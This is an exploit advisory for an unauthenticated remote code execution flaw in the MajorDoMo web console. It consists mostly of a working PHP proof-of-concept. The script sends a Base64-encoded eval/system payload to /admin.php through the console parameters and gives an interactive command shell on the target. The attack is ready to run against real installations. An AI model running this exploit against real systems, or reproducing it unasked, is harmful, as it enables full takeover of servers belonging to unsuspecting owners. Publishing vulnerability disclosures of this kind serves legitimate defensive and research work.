=============================================================================================================================================
| # Title     : MajorDoMo Console Unauthenticated Remote Code Execution                                                                     |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                            |
| # Vendor    : https://majordomohome.com/                                                                                                  |
=============================================================================================================================================

[+] Summary    :  A critical vulnerability in the MajorDoMo web console allows unauthenticated remote attackers to execute arbitrary system commands on the target server. 
                  By sending crafted requests to the /admin.php endpoint with manipulated console parameters, an attacker can inject and execute PHP code remotely. 
				  The provided proof-of-concept demonstrates how a Base64-encoded payload is delivered and evaluated on the target system, enabling interactive command execution without authentication. 
                  This vulnerability may lead to full system compromise depending on the privileges of the web server process.
				  
[+] POC   :  

<?php

$target = "http://localhost"; 
$endpoint = "/admin.php";

$payload = "system(\$_GET['cmd']);";
$encoded_payload = base64_encode($payload);
$final_command = "eval(base64_decode('$encoded_payload'));";

echo "--- [ MajorDoMo RCE Exploit ] ---\n";
echo "[*] Target: $target\n";
echo "[*] Sending Payload...\n";

function send_payload($url, $params) {
    $query = http_build_query($params);
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url . "?" . $query);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_TIMEOUT, 10);
    $response = curl_exec($ch);
    curl_close($ch);
    return $response;
}
while (true) {
    echo "shell@majordomo:~$ ";
    $cmd = trim(fgets(STDIN));
    
    if ($cmd == 'exit') break;

    $params = [
        'ajax_panel' => '1',
        'op' => 'console',
        'command' => $final_command,
        'cmd' => $cmd 
    ];

    $output = send_payload($target . $endpoint, $params);
    
    if ($output) {
        echo "\n" . trim($output) . "\n\n";
    } else {
        echo "[-] No response received or the target is not vulnerable.\n";
    }
}
?>
	
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================